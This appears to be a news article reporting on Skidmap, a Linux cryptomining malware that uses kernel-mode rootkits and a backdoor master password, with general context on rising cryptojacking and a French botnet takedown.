A new Linux Malware, Skidmap, is using Rootkit Capabilities to mine crypto undetected as reported by two threat analysts, Augusto Remillano II, and Jakub Urbanec.
In a post by the two threat analysts on September 16, they indicated that they had discovered a new Linux malware that keeps cryptocurrency mining operations hidden as well as allows hackers to easily gain access to systems. According to the post, the Linux malware can hide its cryptocurrency mining activities by loading malicious kernel modules.
How it Works
Skidmap loads malicious kernel modules to hide its cryptocurrency mining activities. To meet this objective, it fakes network traffic and CPU usage. This malware installs through crontab after which it downloads multiple binaries to the infected device. The binaries affect the device’s security settings. The malware provides backdoor access to the system.
Other than generating cryptocurrency, it also sets up a secret master password on the infected system. The password gives attackers complete system access just as the system would provide a registered user.
According to an analysis by Remillano and Urbanec, “it loads kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts – but attackers can also use them to gain unfettered access to the affected system.”
What makes Skidmap a Major Threat?
Analysts indicate that this malware employs a reasonably advanced method of ensuring it is undetected. Its use of LKMrootkits makes it challenging to clean as compared to other malware designed to perform similar activities.
Skidmap comes with several ways to access affected machines. This diversity makes it difficult to clean a device and retain its clarity. It becomes difficult to keep it clean because even after cleaning the machine, this malware will re-infect the system.
The threat of cryptojacking is not a new concept in the industry. Cryptocurrency mining malware is a prevalent threat. In a report by McAfee Labs Threats Report in early August, there has been an increase in cryptojacking cases and malware attacks showing a 29% increase as of the time of the document release. The threats are not just focussing on Windows, but also on Macintosh, which was not initially the case.
Recently, Authorities in France reported that they have shut down a cryptocurrency mining botnet (Crypto-Jacking Virus) that had infected more than 850,000 computers across 100 countries.
Comments